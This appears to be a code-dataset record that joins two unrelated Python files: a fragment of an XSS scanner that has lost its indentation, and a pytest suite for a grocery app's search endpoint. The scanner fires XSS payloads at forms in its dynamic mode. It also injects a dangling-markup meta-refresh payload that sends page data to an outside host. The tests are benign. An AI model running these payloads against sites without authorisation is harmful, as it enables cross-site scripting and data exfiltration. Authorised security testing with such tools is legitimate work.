scan.info(f"Scanning page: \x1b[1m{page.url}\x1b[0m")
forms = page.get_forms()
if forms != []:
for form in forms:
if 'action' in form.attrs and form.attrs['action'] != '':
action = form.attrs['action']
else:
action = page.url
if 'method' in form.attrs:
method = form.attrs['method']
else:
method = "GET"
inputs = form.find("input") + form.find("textarea")
names = {}
for input_tag in inputs:
if "name" in input_tag.attrs:
name = input_tag.attrs["name"]
if "type" in input_tag.attrs and input_tag.attrs["type"] == "hidden":
try:
names[name] = input_tag.attrs["value"]
except:
pass
else:
names[name] = ''
new_form = Form(page.url, urljoin(page.url, action), method, names, scan.cookies, scan.secure)
if new_form.test_dom():
scan.info("Parameter reflected in DOM and no htmlspecialchars detected")
if page.csp != {}:
csps = page.format_csp()
scan.print()
scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
scan.print(csps)
scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
scan.print()
if page.scan():
vulns = page.vulns
scan.info(f"Number of vulnerabilities found: {len(vulns)}\n")
for vuln in vulns:
scan.vuln(f"Vulnerability: \x1b[1m{vuln['value']}\x1b[0m")
scan.vuln(f"Payload: {vuln['payload']}\n")
if scan.dynamic:
scan.info(f"Starting dynamic mode ...")
for vuln in vulns:
scan.info(f"Testing: \x1b[1m{vuln['value']}\x1b[0m")
if new_form.exploit(vuln['payload']):
scan.succeed(f"Payload found on \x1b[1m{page.url}\x1b[0m")
scan.succeed(f"Payload: {vuln['payload']}\n")
else:
scan.fail("Payload tested didn't work\n")
else:
scan.fail(f"No XSS found\n")
if scan.dynamic:
scan.info("Testing Dangling Markup ...")
dangling_markup_payload = "<meta http-equiv=\"refresh\" content='0; url=https://0xhorizon.eu?data="
if new_form.exploit(dangling_markup_payload, True):
scan.succeed(f"Dangling markup payload found: {dangling_markup_payload}\n")
else:
scan.fail("No dangling markup detected\n")
else:
scan.info("Perhaps you can exploit Dangling Markup\n")
else:
scan.fail(f"No CSP on page {page.url}\n")
else:
scan.fail("No parameter reflected in DOM or htmlspecialchars detected\n")
else:
scan.fail("No form found on this page\n")
scan.info("Scan finished")
| 60.191038 | 429 | 0.58971 | 6,951 | 0.272364 | 0 | 0 | 0 | 0 | 0 | 0 | 12,911 | 0.505897 |
d32ea4782a875805c450b276ed30f51fc7a8a52c | 4,079 | py | Python | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | null | null | null | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | 18 | 2019-02-09T21:59:15.000Z | 2019-03-10T19:13:19.000Z | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | 2 | 2019-02-12T17:12:22.000Z | 2019-02-25T05:41:31.000Z | import json
import search
import test_data
import copy
from utils import Error
def test_no_args(client):
'''
Tests search without arguments.
'''
rv = client.get('/search')
response = json.loads(rv.data)
assert response == {'success': False,
'error': Error.MISSING_KEYWORD_UPC.value}
def test_extra_args(client):
'''
Tests search with wrong argument names.
'''
rv = client.get('/search', data=json.dumps({
'extra': 'peilun'
}))
response = json.loads(rv.data)
assert response == {'success': False,
'error': Error.MISSING_KEYWORD_UPC.value}
def test_search_by_upc(client, existing_item):
'''
Tests searching items by UPC.
'''
upc = str(existing_item.upc)
rv = client.get('/search?upc=' + upc)
response = json.loads(rv.data)
first = response[0]
assert first['upc'] == upc
def test_search_by_keyword_lower(client, existing_item):
'''
Tests searching items with a lowercase keyword.
'''
upc = str(existing_item.upc)
name = str(existing_item.name).lower()
rv = client.get('/search?keyword=' + name)
response = json.loads(rv.data)
first = response[0]
assert first['upc'] == upc
def test_search_by_keyword_upper(client, existing_item):
'''
Tests searching items with an uppercase keyword.
'''
upc = str(existing_item.upc)
name = str(existing_item.name).upper()
rv = client.get('/search?keyword=' + name)
response = json.loads(rv.data)
first = response[0]
assert first['upc'] == upc
def test_search_by_keyword_mixed(client, existing_item):
'''
Tests searching items with a mixed case keyword.
'''
upc = str(existing_item.upc)
name = str(existing_item.name).lower()
first = name[:int(len(name) / 2)].upper()
second = name[int(len(name) / 2):]
name = first + second
rv = client.get('/search?keyword=' + name)
response = json.loads(rv.data)
first = response[0]
assert first['upc'] == upc
def test_search_by_keyword_partial(client, existing_item):
'''
Tests searching items with a keyword partially matches.
'''
upc = str(existing_item.upc)
name = str(existing_item.name).lower()
name = name[:int(len(name) / 2)]
rv = client.get('/search?keyword=' + name)
response = json.loads(rv.data)
first = response[0]
assert first['upc'] == upc
def test_search_upc_over_keyword(client):
'''
Tests that UPC is prioritized over keyword
if both are given.
'''
first_item = copy.deepcopy(test_data.valid_items[0])
first_item.save()
first_upc = first_item.upc
first_name = first_item.name
second_item = copy.deepcopy(test_data.valid_items[1])
second_item.save()
second_upc = second_item.upc
second_name = second_item.name
assert first_upc != second_upc
assert not first_name in second_name and not second_name in first_name
rv = client.get(str.format(
'/search?upc={}&keyword={}', first_upc, second_name))
response = json.loads(rv.data)
first_result = response[0]
assert first_result['upc'] == first_upc
def test_invalid_limit(client, existing_item):
'''
Tests searching items with a max limit of 0 results.
'''
name = str(existing_item.name).lower()
rv = client.get('/search?keyword=' + name + '&limit=0')
response = json.loads(rv.data)
assert response == {'success': False,
'error': Error.INVALID_LIMIT.value}
def test_limit(client, db):
'''
Tests searching items with a max limit of results.
'''
keyword = 'test'
limit = 1
matches = []
for i in test_data.valid_items:
if keyword in i.name:
copy.deepcopy(i).save()
matches.append(i)
matches = sorted(matches, key=lambda i: i.upc)
rv = client.get('/search?keyword=' + keyword + '&limit=' + str(limit))
response = json.loads(rv.data)
assert len(response) == limit
assert response[0]['upc'] == matches[0].upc
| 25.335404 | 74 | 0.634714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 914 | 0.224075 |